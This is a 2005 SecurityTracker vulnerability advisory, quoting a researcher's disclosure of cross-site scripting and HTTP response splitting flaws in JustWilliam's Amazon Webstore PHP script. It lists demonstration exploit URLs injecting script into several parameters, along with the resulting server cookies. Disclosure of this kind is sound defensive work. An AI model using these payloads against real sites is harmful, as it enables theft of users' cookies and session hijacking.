SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   Amazon Webstore (JustWilliam's) Vendors:   JustWilliam's
JustWilliam's Amazon Webstore Input Validation Holes Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013836
SecurityTracker URL:  http://securitytracker.com/id/1013836
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 29 2005
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  

Description:   Lostmon reported a vulnerability in JustWilliam's Amazon Webstore. A remote user can conduct cross-site scripting attacks.

The 'index.php' and 'closeup.php' scripts do not properly validate user-supplied input in several parameters. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Amazon Webstore software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/store/uk/product/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm

http://[target]/store/uk/product/">%0d%0aSet-Cookie:%20
HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm

http://[target]/closeup.php?image=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/index.php?currentIsExpanded=3D0%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E&currentNumber=3D8

http://[target]/index.php?function=3Dsearch&searchFor=3D
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/uk/list/c/software_CAD_Technical_60002_uk.htm?
currentNumber=3D4.3%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E&currentIsExpanded=3D0

The vendor was notified on April 26, 2005.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Amazon Webstore software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  scripts.justwilliams.com/amazon/index.htm (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Amazon webstore script injection and XSS


 #########################################################
Amazon webstore script injection and XSS
vendor:http://scripts.justwilliams.com/amazon/index.htm
advisory:http://lostmon.blogspot.com/2005/04/
amazon-webstore-script-injection-and.html
vendor informed: yes exploit available:yes

#########################################################


Amazon Webstore is a project that is currently being developed
at JustWilliam's. It is written in PHP and is designed to interface
with Amazon's vast database of products

Amazon Webstore contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'image' or 'currentIsExpanded''searchFor'and 'currentNumber'
upon submission to the 'index.php'and 'closeup.php' scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.


##########
versions:
##########

Amazon Webstore Version 04050100

also is posible prior versions are afected.
#########
Solution:
#########

no solution at this time

##########
timeline:
##########

discovered: 25 april 2005
vendor notify: 26 april 2005
vendor response:
vendor fix:
disclosure:28 april 2005

##########
exploits :
##########

http://[victim]/store/uk/product/%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm

and server respose with this cookie :

ourhistory[uk]
a%3A1%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert
%28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7B
s%3A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+
-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
2981060096
29706949
933228160
29706915
*
them if we try to inject a malicious javascript it is execute
everytime what we navigate on a link of the page.

http://[victim]/store/uk/product/">%0d%0aSet-Cookie:%20
HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm

and server respond with cookie:

ourhistory[uk]
a%3A1%3A%7Bs%3A56%3A%22asin-%0D%0ASet-Cookie%3A
+HTTP_response_splitting%3DYES%0D%0AFoo%3A+bar%22%
3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A20%3A%22-+No
+product+found+-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
1656289024
29706956
995487088
29706922
*

if we inject first url and after the second the server set this cookie:

ourhistory[uk]
a%3A3%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert%
28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7Bs%3
A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+-%22%3
Bs%3A1%3A%22i%22%3BN%3B%7Ds%3A15%3A%22asin-B00004UAFX
%22%3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A17%3A%22Story+
Book+Weaver%22%3Bs%3A1%3A%22i%22%3Bs%3A63%3A%22http%3
A%2F%2localhost%2Fimages%2FP%2FB00004UAFX.02.THUMBZZ
localhost/
1536
1656289024
29706956
995487088
29706922
*
######################
XX on others scripts
######################


http://[victim]/closeup.php?image=3D%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E


http://[victim]/index.php?currentIsExpanded=3D0%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E&currentNumber=3D8

http://[victim]/index.php?function=3Dsearch&searchFor=3D
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


http://[victim]/uk/list/c/software_CAD_Technical_60002_uk.htm?
currentNumber=3D4.3%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E&currentIsExpanded=3D0



is posible to others scripts are vulnerables too

################# End ###################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--=20
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC